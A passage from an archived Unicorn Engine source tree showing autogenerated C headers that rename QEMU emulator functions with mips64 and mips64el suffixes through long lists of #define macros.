helper_msa_mod_s_w helper_msa_mod_s_w_mips64 #define helper_msa_mod_s_d helper_msa_mod_s_d_mips64 #define helper_msa_mod_u_b helper_msa_mod_u_b_mips64 #define helper_msa_mod_u_h helper_msa_mod_u_h_mips64 #define helper_msa_mod_u_w helper_msa_mod_u_w_mips64 #define helper_msa_mod_u_d helper_msa_mod_u_d_mips64 #define helper_msa_asub_s_b helper_msa_asub_s_b_mips64 #define helper_msa_asub_s_h helper_msa_asub_s_h_mips64 #define helper_msa_asub_s_w helper_msa_asub_s_w_mips64 #define helper_msa_asub_s_d helper_msa_asub_s_d_mips64 #define helper_msa_asub_u_b helper_msa_asub_u_b_mips64 #define helper_msa_asub_u_h helper_msa_asub_u_h_mips64 #define helper_msa_asub_u_w helper_msa_asub_u_w_mips64 #define helper_msa_asub_u_d helper_msa_asub_u_d_mips64 #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mips64 #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mips64 #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mips64 #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mips64 #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mips64 #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mips64 #define helper_msa_ilvev_b helper_msa_ilvev_b_mips64 #define helper_msa_ilvev_h helper_msa_ilvev_h_mips64 #define helper_msa_ilvev_w helper_msa_ilvev_w_mips64 #define helper_msa_ilvev_d helper_msa_ilvev_d_mips64 #define helper_msa_ilvod_b helper_msa_ilvod_b_mips64 #define helper_msa_ilvod_h helper_msa_ilvod_h_mips64 #define helper_msa_ilvod_w helper_msa_ilvod_w_mips64 #define helper_msa_ilvod_d helper_msa_ilvod_d_mips64 #define helper_msa_ilvl_b helper_msa_ilvl_b_mips64 #define helper_msa_ilvl_h helper_msa_ilvl_h_mips64 #define helper_msa_ilvl_w helper_msa_ilvl_w_mips64 #define helper_msa_ilvl_d helper_msa_ilvl_d_mips64 #define helper_msa_ilvr_b helper_msa_ilvr_b_mips64 #define helper_msa_ilvr_h helper_msa_ilvr_h_mips64 #define helper_msa_ilvr_w helper_msa_ilvr_w_mips64 #define helper_msa_ilvr_d helper_msa_ilvr_d_mips64 #define helper_msa_and_v helper_msa_and_v_mips64 #define helper_msa_nor_v helper_msa_nor_v_mips64 #define helper_msa_or_v helper_msa_or_v_mips64 #define helper_msa_xor_v helper_msa_xor_v_mips64 #define helper_msa_move_v helper_msa_move_v_mips64 #define helper_msa_pckev_b helper_msa_pckev_b_mips64 #define helper_msa_pckev_h helper_msa_pckev_h_mips64 #define helper_msa_pckev_w helper_msa_pckev_w_mips64 #define helper_msa_pckev_d helper_msa_pckev_d_mips64 #define helper_msa_pckod_b helper_msa_pckod_b_mips64 #define helper_msa_pckod_h helper_msa_pckod_h_mips64 #define helper_msa_pckod_w helper_msa_pckod_w_mips64 #define helper_msa_pckod_d helper_msa_pckod_d_mips64 #define helper_msa_sll_b helper_msa_sll_b_mips64 #define helper_msa_sll_h helper_msa_sll_h_mips64 #define helper_msa_sll_w helper_msa_sll_w_mips64 #define helper_msa_sll_d helper_msa_sll_d_mips64 #define helper_msa_sra_b helper_msa_sra_b_mips64 #define helper_msa_sra_h helper_msa_sra_h_mips64 #define helper_msa_sra_w helper_msa_sra_w_mips64 #define helper_msa_sra_d helper_msa_sra_d_mips64 #define helper_msa_srar_b helper_msa_srar_b_mips64 #define helper_msa_srar_h helper_msa_srar_h_mips64 #define helper_msa_srar_w helper_msa_srar_w_mips64 #define helper_msa_srar_d helper_msa_srar_d_mips64 #define helper_msa_srl_b helper_msa_srl_b_mips64 #define helper_msa_srl_h helper_msa_srl_h_mips64 #define helper_msa_srl_w helper_msa_srl_w_mips64 #define helper_msa_srl_d helper_msa_srl_d_mips64 #define helper_msa_srlr_b helper_msa_srlr_b_mips64 #define helper_msa_srlr_h helper_msa_srlr_h_mips64 #define helper_msa_srlr_w helper_msa_srlr_w_mips64 #define helper_msa_srlr_d helper_msa_srlr_d_mips64 #define helper_msa_andi_b helper_msa_andi_b_mips64 #define helper_msa_ori_b helper_msa_ori_b_mips64 #define helper_msa_nori_b helper_msa_nori_b_mips64 #define helper_msa_xori_b helper_msa_xori_b_mips64 #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64 #define helper_msa_bmzi_b helper_msa_bmzi_b_mips64 #define helper_msa_bseli_b helper_msa_bseli_b_mips64 #define helper_msa_shf_df helper_msa_shf_df_mips64 #define helper_msa_addvi_df helper_msa_addvi_df_mips64 #define helper_msa_subvi_df helper_msa_subvi_df_mips64 #define helper_msa_ceqi_df helper_msa_ceqi_df_mips64 #define helper_msa_clei_s_df helper_msa_clei_s_df_mips64 #define helper_msa_clei_u_df helper_msa_clei_u_df_mips64 #define helper_msa_clti_s_df helper_msa_clti_s_df_mips64 #define helper_msa_clti_u_df helper_msa_clti_u_df_mips64 #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64 #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64 #define helper_msa_mini_s_df helper_msa_mini_s_df_mips64 #define helper_msa_mini_u_df helper_msa_mini_u_df_mips64 #define helper_msa_ldi_df helper_msa_ldi_df_mips64 #define helper_msa_slli_df helper_msa_slli_df_mips64 #define helper_msa_srai_df helper_msa_srai_df_mips64 #define helper_msa_srli_df helper_msa_srli_df_mips64 #define helper_msa_bclri_df helper_msa_bclri_df_mips64 #define helper_msa_bseti_df helper_msa_bseti_df_mips64 #define helper_msa_bnegi_df helper_msa_bnegi_df_mips64 #define helper_msa_sat_s_df helper_msa_sat_s_df_mips64 #define helper_msa_sat_u_df helper_msa_sat_u_df_mips64 #define helper_msa_srari_df helper_msa_srari_df_mips64 #define helper_msa_srlri_df helper_msa_srlri_df_mips64 #define helper_msa_binsli_df helper_msa_binsli_df_mips64 #define helper_msa_binsri_df helper_msa_binsri_df_mips64 #define helper_msa_subv_df helper_msa_subv_df_mips64 #define helper_msa_subs_s_df helper_msa_subs_s_df_mips64 #define helper_msa_subs_u_df helper_msa_subs_u_df_mips64 #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64 #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64 #define helper_msa_mulv_df helper_msa_mulv_df_mips64 #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64 #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64 #define helper_msa_mul_q_df helper_msa_mul_q_df_mips64 #define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64 #define helper_msa_sld_df helper_msa_sld_df_mips64 #define helper_msa_maddv_df helper_msa_maddv_df_mips64 #define helper_msa_msubv_df helper_msa_msubv_df_mips64 #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64 #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64 #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64 #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64 #define helper_msa_binsl_df helper_msa_binsl_df_mips64 #define helper_msa_binsr_df helper_msa_binsr_df_mips64 #define helper_msa_madd_q_df helper_msa_madd_q_df_mips64 #define helper_msa_msub_q_df helper_msa_msub_q_df_mips64 #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64 #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64 #define helper_msa_splat_df helper_msa_splat_df_mips64 #define helper_msa_vshf_df helper_msa_vshf_df_mips64 #define helper_msa_sldi_df helper_msa_sldi_df_mips64 #define helper_msa_splati_df helper_msa_splati_df_mips64 #define helper_msa_copy_s_b helper_msa_copy_s_b_mips64 #define helper_msa_copy_s_h helper_msa_copy_s_h_mips64 #define helper_msa_copy_s_w helper_msa_copy_s_w_mips64 #define helper_msa_copy_s_d helper_msa_copy_s_d_mips64 #define helper_msa_copy_u_b helper_msa_copy_u_b_mips64 #define helper_msa_copy_u_h helper_msa_copy_u_h_mips64 #define helper_msa_copy_u_w helper_msa_copy_u_w_mips64 #define helper_msa_insert_b helper_msa_insert_b_mips64 #define helper_msa_insert_h helper_msa_insert_h_mips64 #define helper_msa_insert_w helper_msa_insert_w_mips64 #define helper_msa_insert_d helper_msa_insert_d_mips64 #define helper_msa_insve_df helper_msa_insve_df_mips64 #define helper_msa_ctcmsa helper_msa_ctcmsa_mips64 #define helper_msa_cfcmsa helper_msa_cfcmsa_mips64 #define helper_msa_fill_df helper_msa_fill_df_mips64 #define helper_msa_fcaf_df helper_msa_fcaf_df_mips64 #define helper_msa_fcun_df helper_msa_fcun_df_mips64 #define helper_msa_fceq_df helper_msa_fceq_df_mips64 #define helper_msa_fcueq_df helper_msa_fcueq_df_mips64 #define helper_msa_fclt_df helper_msa_fclt_df_mips64 #define helper_msa_fcult_df helper_msa_fcult_df_mips64 #define helper_msa_fcle_df helper_msa_fcle_df_mips64 #define helper_msa_fcule_df helper_msa_fcule_df_mips64 #define helper_msa_fsaf_df helper_msa_fsaf_df_mips64 #define helper_msa_fsun_df helper_msa_fsun_df_mips64 #define helper_msa_fseq_df helper_msa_fseq_df_mips64 #define helper_msa_fsueq_df helper_msa_fsueq_df_mips64 #define helper_msa_fslt_df helper_msa_fslt_df_mips64 #define helper_msa_fsult_df helper_msa_fsult_df_mips64 #define helper_msa_fsle_df helper_msa_fsle_df_mips64 #define helper_msa_fsule_df helper_msa_fsule_df_mips64 #define helper_msa_fcor_df helper_msa_fcor_df_mips64 #define helper_msa_fcune_df helper_msa_fcune_df_mips64 #define helper_msa_fcne_df helper_msa_fcne_df_mips64 #define helper_msa_fsor_df helper_msa_fsor_df_mips64 #define helper_msa_fsune_df helper_msa_fsune_df_mips64 #define helper_msa_fsne_df helper_msa_fsne_df_mips64 #define helper_msa_fadd_df helper_msa_fadd_df_mips64 #define helper_msa_fsub_df helper_msa_fsub_df_mips64 #define helper_msa_fmul_df helper_msa_fmul_df_mips64 #define helper_msa_fdiv_df helper_msa_fdiv_df_mips64 #define helper_msa_fmadd_df helper_msa_fmadd_df_mips64 #define helper_msa_fmsub_df helper_msa_fmsub_df_mips64 #define helper_msa_fexp2_df helper_msa_fexp2_df_mips64 #define helper_msa_fexdo_df helper_msa_fexdo_df_mips64 #define helper_msa_ftq_df helper_msa_ftq_df_mips64 #define helper_msa_fmin_df helper_msa_fmin_df_mips64 #define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64 #define helper_msa_fmax_df helper_msa_fmax_df_mips64 #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64 #define helper_msa_fclass_df helper_msa_fclass_df_mips64 #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64 #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64 #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64 #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64 #define helper_msa_frcp_df helper_msa_frcp_df_mips64 #define helper_msa_frint_df helper_msa_frint_df_mips64 #define helper_msa_flog2_df helper_msa_flog2_df_mips64 #define helper_msa_fexupl_df helper_msa_fexupl_df_mips64 #define helper_msa_fexupr_df helper_msa_fexupr_df_mips64 #define helper_msa_ffql_df helper_msa_ffql_df_mips64 #define helper_msa_ffqr_df helper_msa_ffqr_df_mips64 #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64 #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64 #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64 #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64 #define helper_raise_exception_err helper_raise_exception_err_mips64 #define helper_raise_exception helper_raise_exception_mips64 #define helper_raise_exception_debug helper_raise_exception_debug_mips64 #define helper_muls helper_muls_mips64 #define helper_mulsu helper_mulsu_mips64 #define helper_macc helper_macc_mips64 #define helper_macchi helper_macchi_mips64 #define helper_maccu helper_maccu_mips64 #define helper_macchiu helper_macchiu_mips64 #define helper_msac helper_msac_mips64 #define helper_msachi helper_msachi_mips64 #define helper_msacu helper_msacu_mips64 #define helper_msachiu helper_msachiu_mips64 #define helper_mulhi helper_mulhi_mips64 #define helper_mulhiu helper_mulhiu_mips64 #define helper_mulshi helper_mulshi_mips64 #define helper_mulshiu helper_mulshiu_mips64 #define helper_dbitswap helper_dbitswap_mips64 #define helper_bitswap helper_bitswap_mips64 #define helper_rotx helper_rotx_mips64 #define helper_ll helper_ll_mips64 #define helper_lld helper_lld_mips64 #define helper_swl helper_swl_mips64 #define helper_swr helper_swr_mips64 #define helper_sdl helper_sdl_mips64 #define helper_sdr helper_sdr_mips64 #define helper_lwm helper_lwm_mips64 #define helper_swm helper_swm_mips64 #define helper_ldm helper_ldm_mips64 #define helper_sdm helper_sdm_mips64 #define helper_fork helper_fork_mips64 #define helper_yield helper_yield_mips64 #define r4k_helper_tlbinv r4k_helper_tlbinv_mips64 #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64 #define r4k_helper_tlbwi r4k_helper_tlbwi_mips64 #define r4k_helper_tlbwr r4k_helper_tlbwr_mips64 #define r4k_helper_tlbp r4k_helper_tlbp_mips64 #define r4k_helper_tlbr r4k_helper_tlbr_mips64 #define helper_tlbwi helper_tlbwi_mips64 #define helper_tlbwr helper_tlbwr_mips64 #define helper_tlbp helper_tlbp_mips64 #define helper_tlbr helper_tlbr_mips64 #define helper_tlbinv helper_tlbinv_mips64 #define helper_tlbinvf helper_tlbinvf_mips64 #define helper_ginvt helper_ginvt_mips64 #define helper_di helper_di_mips64 #define helper_ei helper_ei_mips64 #define helper_eret helper_eret_mips64 #define helper_eretnc helper_eretnc_mips64 #define helper_deret helper_deret_mips64 #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64 #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64 #define helper_rdhwr_cc helper_rdhwr_cc_mips64 #define helper_rdhwr_ccres helper_rdhwr_ccres_mips64 #define helper_rdhwr_performance helper_rdhwr_performance_mips64 #define helper_rdhwr_xnp helper_rdhwr_xnp_mips64 #define helper_pmon helper_pmon_mips64 #define helper_wait helper_wait_mips64 #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64 #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mips64 #define helper_msa_ld_b helper_msa_ld_b_mips64 #define helper_msa_ld_h helper_msa_ld_h_mips64 #define helper_msa_ld_w helper_msa_ld_w_mips64 #define helper_msa_ld_d helper_msa_ld_d_mips64 #define helper_msa_st_b helper_msa_st_b_mips64 #define helper_msa_st_h helper_msa_st_h_mips64 #define helper_msa_st_w helper_msa_st_w_mips64 #define helper_msa_st_d helper_msa_st_d_mips64 #define helper_cache helper_cache_mips64 #define gen_intermediate_code gen_intermediate_code_mips64 #define mips_tcg_init mips_tcg_init_mips64 #define cpu_mips_realize_env cpu_mips_realize_env_mips64 #define cpu_state_reset cpu_state_reset_mips64 #define restore_state_to_opc restore_state_to_opc_mips64 #define ieee_rm ieee_rm_mips64 #define mips_defs mips_defs_mips64 #define mips_defs_number mips_defs_number_mips64 #define gen_helper_float_class_s gen_helper_float_class_s_mips64 #define gen_helper_float_class_d gen_helper_float_class_d_mips64 #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/mips64el.h�����������������������������������������������������������������������0000664�0000000�0000000�00000413401�14675241067�0015772�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_mips64el_H #define UNICORN_AUTOGEN_mips64el_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _mips64el #endif #define unicorn_fill_tlb unicorn_fill_tlb_mips64el #define reg_read reg_read_mips64el #define reg_write reg_write_mips64el #define uc_init uc_init_mips64el #define uc_add_inline_hook uc_add_inline_hook_mips64el #define uc_del_inline_hook uc_del_inline_hook_mips64el #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64el #define use_idiv_instructions use_idiv_instructions_mips64el #define arm_arch arm_arch_mips64el #define tb_target_set_jmp_target tb_target_set_jmp_target_mips64el #define have_bmi1 have_bmi1_mips64el #define have_popcnt have_popcnt_mips64el #define have_avx1 have_avx1_mips64el #define have_avx2 have_avx2_mips64el #define have_isa have_isa_mips64el #define have_altivec have_altivec_mips64el #define have_vsx have_vsx_mips64el #define flush_icache_range flush_icache_range_mips64el #define s390_facilities s390_facilities_mips64el #define tcg_dump_op tcg_dump_op_mips64el #define tcg_dump_ops tcg_dump_ops_mips64el #define tcg_gen_and_i64 tcg_gen_and_i64_mips64el #define tcg_gen_discard_i64 tcg_gen_discard_i64_mips64el #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mips64el #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mips64el #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mips64el #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mips64el #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_mips64el #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mips64el #define tcg_gen_ld_i64 tcg_gen_ld_i64_mips64el #define tcg_gen_mov_i64 tcg_gen_mov_i64_mips64el #define tcg_gen_movi_i64 tcg_gen_movi_i64_mips64el #define tcg_gen_mul_i64 tcg_gen_mul_i64_mips64el #define tcg_gen_or_i64 tcg_gen_or_i64_mips64el #define tcg_gen_sar_i64 tcg_gen_sar_i64_mips64el #define tcg_gen_shl_i64 tcg_gen_shl_i64_mips64el #define tcg_gen_shr_i64 tcg_gen_shr_i64_mips64el #define tcg_gen_st_i64 tcg_gen_st_i64_mips64el #define tcg_gen_xor_i64 tcg_gen_xor_i64_mips64el #define cpu_icount_to_ns cpu_icount_to_ns_mips64el #define cpu_is_stopped cpu_is_stopped_mips64el #define cpu_get_ticks cpu_get_ticks_mips64el #define cpu_get_clock cpu_get_clock_mips64el #define cpu_resume cpu_resume_mips64el #define qemu_init_vcpu qemu_init_vcpu_mips64el #define cpu_stop_current cpu_stop_current_mips64el #define resume_all_vcpus resume_all_vcpus_mips64el #define vm_start vm_start_mips64el #define address_space_dispatch_compact address_space_dispatch_compact_mips64el #define flatview_translate flatview_translate_mips64el #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64el #define qemu_get_cpu qemu_get_cpu_mips64el #define cpu_address_space_init cpu_address_space_init_mips64el #define cpu_get_address_space cpu_get_address_space_mips64el #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mips64el #define cpu_exec_initfn cpu_exec_initfn_mips64el #define cpu_exec_realizefn cpu_exec_realizefn_mips64el #define tb_invalidate_phys_addr tb_invalidate_phys_addr_mips64el #define cpu_watchpoint_insert cpu_watchpoint_insert_mips64el #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64el #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64el #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64el #define cpu_breakpoint_insert cpu_breakpoint_insert_mips64el #define cpu_breakpoint_remove cpu_breakpoint_remove_mips64el #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64el #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64el #define cpu_abort cpu_abort_mips64el #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mips64el #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mips64el #define flatview_add_to_dispatch flatview_add_to_dispatch_mips64el #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mips64el #define qemu_ram_get_offset qemu_ram_get_offset_mips64el #define qemu_ram_get_used_length qemu_ram_get_used_length_mips64el #define qemu_ram_is_shared qemu_ram_is_shared_mips64el #define qemu_ram_pagesize qemu_ram_pagesize_mips64el #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mips64el #define qemu_ram_alloc qemu_ram_alloc_mips64el #define qemu_ram_free qemu_ram_free_mips64el #define qemu_map_ram_ptr qemu_map_ram_ptr_mips64el #define qemu_ram_block_host_offset qemu_ram_block_host_offset_mips64el #define qemu_ram_block_from_host qemu_ram_block_from_host_mips64el #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mips64el #define cpu_check_watchpoint cpu_check_watchpoint_mips64el #define iotlb_to_section iotlb_to_section_mips64el #define address_space_dispatch_new address_space_dispatch_new_mips64el #define address_space_dispatch_free address_space_dispatch_free_mips64el #define flatview_read_continue flatview_read_continue_mips64el #define address_space_read_full address_space_read_full_mips64el #define address_space_write address_space_write_mips64el #define address_space_rw address_space_rw_mips64el #define cpu_physical_memory_rw cpu_physical_memory_rw_mips64el #define address_space_write_rom address_space_write_rom_mips64el #define cpu_flush_icache_range cpu_flush_icache_range_mips64el #define cpu_exec_init_all cpu_exec_init_all_mips64el #define address_space_access_valid address_space_access_valid_mips64el #define address_space_map address_space_map_mips64el #define address_space_unmap address_space_unmap_mips64el #define cpu_physical_memory_map cpu_physical_memory_map_mips64el #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64el #define cpu_memory_rw_debug cpu_memory_rw_debug_mips64el #define qemu_target_page_size qemu_target_page_size_mips64el #define qemu_target_page_bits qemu_target_page_bits_mips64el #define qemu_target_page_bits_min qemu_target_page_bits_min_mips64el #define target_words_bigendian target_words_bigendian_mips64el #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64el #define ram_block_discard_range ram_block_discard_range_mips64el #define ramblock_is_pmem ramblock_is_pmem_mips64el #define page_size_init page_size_init_mips64el #define set_preferred_target_page_bits set_preferred_target_page_bits_mips64el #define finalize_target_page_bits finalize_target_page_bits_mips64el #define cpu_outb cpu_outb_mips64el #define cpu_outw cpu_outw_mips64el #define cpu_outl cpu_outl_mips64el #define cpu_inb cpu_inb_mips64el #define cpu_inw cpu_inw_mips64el #define cpu_inl cpu_inl_mips64el #define memory_map memory_map_mips64el #define memory_map_io memory_map_io_mips64el #define memory_map_ptr memory_map_ptr_mips64el #define memory_cow memory_cow_mips64el #define memory_unmap memory_unmap_mips64el #define memory_moveout memory_moveout_mips64el #define memory_movein memory_movein_mips64el #define memory_free memory_free_mips64el #define flatview_unref flatview_unref_mips64el #define address_space_get_flatview address_space_get_flatview_mips64el #define memory_region_transaction_begin memory_region_transaction_begin_mips64el #define memory_region_transaction_commit memory_region_transaction_commit_mips64el #define memory_region_init memory_region_init_mips64el #define memory_region_access_valid memory_region_access_valid_mips64el #define memory_region_dispatch_read memory_region_dispatch_read_mips64el #define memory_region_dispatch_write memory_region_dispatch_write_mips64el #define memory_region_init_io memory_region_init_io_mips64el #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mips64el #define memory_region_size memory_region_size_mips64el #define memory_region_set_readonly memory_region_set_readonly_mips64el #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mips64el #define memory_region_from_host memory_region_from_host_mips64el #define memory_region_get_ram_addr memory_region_get_ram_addr_mips64el #define memory_region_add_subregion memory_region_add_subregion_mips64el #define memory_region_del_subregion memory_region_del_subregion_mips64el #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mips64el #define memory_region_find memory_region_find_mips64el #define memory_region_filter_subregions memory_region_filter_subregions_mips64el #define memory_listener_register memory_listener_register_mips64el #define memory_listener_unregister memory_listener_unregister_mips64el #define address_space_remove_listeners address_space_remove_listeners_mips64el #define address_space_init address_space_init_mips64el #define address_space_destroy address_space_destroy_mips64el #define memory_region_init_ram memory_region_init_ram_mips64el #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips64el #define find_memory_mapping find_memory_mapping_mips64el #define exec_inline_op exec_inline_op_mips64el #define floatx80_default_nan floatx80_default_nan_mips64el #define float_raise float_raise_mips64el #define float16_is_quiet_nan float16_is_quiet_nan_mips64el #define float16_is_signaling_nan float16_is_signaling_nan_mips64el #define float32_is_quiet_nan float32_is_quiet_nan_mips64el #define float32_is_signaling_nan float32_is_signaling_nan_mips64el #define float64_is_quiet_nan float64_is_quiet_nan_mips64el #define float64_is_signaling_nan float64_is_signaling_nan_mips64el #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64el #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64el #define floatx80_silence_nan floatx80_silence_nan_mips64el #define propagateFloatx80NaN propagateFloatx80NaN_mips64el #define float128_is_quiet_nan float128_is_quiet_nan_mips64el #define float128_is_signaling_nan float128_is_signaling_nan_mips64el #define float128_silence_nan float128_silence_nan_mips64el #define float16_add float16_add_mips64el #define float16_sub float16_sub_mips64el #define float32_add float32_add_mips64el #define float32_sub float32_sub_mips64el #define float64_add float64_add_mips64el #define float64_sub float64_sub_mips64el #define float16_mul float16_mul_mips64el #define float32_mul float32_mul_mips64el #define float64_mul float64_mul_mips64el #define float16_muladd float16_muladd_mips64el #define float32_muladd float32_muladd_mips64el #define float64_muladd float64_muladd_mips64el #define float16_div float16_div_mips64el #define float32_div float32_div_mips64el #define float64_div float64_div_mips64el #define float16_to_float32 float16_to_float32_mips64el #define float16_to_float64 float16_to_float64_mips64el #define float32_to_float16 float32_to_float16_mips64el #define float32_to_float64 float32_to_float64_mips64el #define float64_to_float16 float64_to_float16_mips64el #define float64_to_float32 float64_to_float32_mips64el #define float16_round_to_int float16_round_to_int_mips64el #define float32_round_to_int float32_round_to_int_mips64el #define float64_round_to_int float64_round_to_int_mips64el #define float16_to_int16_scalbn float16_to_int16_scalbn_mips64el #define float16_to_int32_scalbn float16_to_int32_scalbn_mips64el #define float16_to_int64_scalbn float16_to_int64_scalbn_mips64el #define float32_to_int16_scalbn float32_to_int16_scalbn_mips64el #define float32_to_int32_scalbn float32_to_int32_scalbn_mips64el #define float32_to_int64_scalbn float32_to_int64_scalbn_mips64el #define float64_to_int16_scalbn float64_to_int16_scalbn_mips64el #define float64_to_int32_scalbn float64_to_int32_scalbn_mips64el #define float64_to_int64_scalbn float64_to_int64_scalbn_mips64el #define float16_to_int16 float16_to_int16_mips64el #define float16_to_int32 float16_to_int32_mips64el #define float16_to_int64 float16_to_int64_mips64el #define float32_to_int16 float32_to_int16_mips64el #define float32_to_int32 float32_to_int32_mips64el #define float32_to_int64 float32_to_int64_mips64el #define float64_to_int16 float64_to_int16_mips64el #define float64_to_int32 float64_to_int32_mips64el #define float64_to_int64 float64_to_int64_mips64el #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mips64el #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mips64el #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mips64el #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mips64el #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mips64el #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mips64el #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64el #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64el #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64el #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mips64el #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mips64el #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mips64el #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mips64el #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mips64el #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mips64el #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mips64el #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mips64el #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mips64el #define float16_to_uint16 float16_to_uint16_mips64el #define float16_to_uint32 float16_to_uint32_mips64el #define float16_to_uint64 float16_to_uint64_mips64el #define float32_to_uint16 float32_to_uint16_mips64el #define float32_to_uint32 float32_to_uint32_mips64el #define float32_to_uint64 float32_to_uint64_mips64el #define float64_to_uint16 float64_to_uint16_mips64el #define float64_to_uint32 float64_to_uint32_mips64el #define float64_to_uint64 float64_to_uint64_mips64el #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mips64el #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mips64el #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mips64el #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mips64el #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mips64el #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mips64el #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64el #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64el #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64el #define int64_to_float16_scalbn int64_to_float16_scalbn_mips64el #define int32_to_float16_scalbn int32_to_float16_scalbn_mips64el #define int16_to_float16_scalbn int16_to_float16_scalbn_mips64el #define int64_to_float16 int64_to_float16_mips64el #define int32_to_float16 int32_to_float16_mips64el #define int16_to_float16 int16_to_float16_mips64el #define int64_to_float32_scalbn int64_to_float32_scalbn_mips64el #define int32_to_float32_scalbn int32_to_float32_scalbn_mips64el #define int16_to_float32_scalbn int16_to_float32_scalbn_mips64el #define int64_to_float32 int64_to_float32_mips64el #define int32_to_float32 int32_to_float32_mips64el #define int16_to_float32 int16_to_float32_mips64el #define int64_to_float64_scalbn int64_to_float64_scalbn_mips64el #define int32_to_float64_scalbn int32_to_float64_scalbn_mips64el #define int16_to_float64_scalbn int16_to_float64_scalbn_mips64el #define int64_to_float64 int64_to_float64_mips64el #define int32_to_float64 int32_to_float64_mips64el #define int16_to_float64 int16_to_float64_mips64el #define uint64_to_float16_scalbn 